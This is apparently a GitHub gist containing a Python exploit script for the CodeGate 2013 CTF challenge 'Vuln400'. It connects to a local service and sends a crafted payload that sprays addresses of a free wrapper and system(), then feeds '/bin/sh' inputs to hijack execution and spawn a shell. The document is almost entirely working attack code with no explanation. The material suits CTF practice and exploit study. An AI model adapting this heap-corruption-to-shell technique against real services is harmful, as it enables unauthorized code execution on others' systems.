@tsunpoko
Created September 25, 2016 05:35
[CodeGate 2013] Vuln400
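from No___Op import *  # author's helper module; Pwning and p32 come from here
import time  # needed for time.sleep() below

target = 'localhost:4444'
c = Pwning( target )
# Addresses in the challenge binary, as given in this gist
system = 0x8048630
free_wrapper = 0x80487c4
# Wait 30 seconds before sending anything
time.sleep(30)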
payload = ''
payload += '1\naaaa\naaaa\naaaa\n'
payload += '1\naaaa\naaaa\n' + p32(free_wrapper)*500 + p32(system)*500+ '\n'
payload += '1\naaaa\naaaa\naaaa\n'
payload += '2\n2\n'
payload += '3\na\n' * 128
payload += '1\n'
payload += '4\n'
payload += '1\naaaa\naaaa\naaaa\n'
payload += '1\naaaa\naaaa\naaaa\n'
payload += '2\n'
payload += '4\n'
payload += '3\n/bin/sh\n' * 128
payload += '2\nbbbb\nbbbb\n'
payload += '1\n'
c.write(payload)
c.dbg_shell()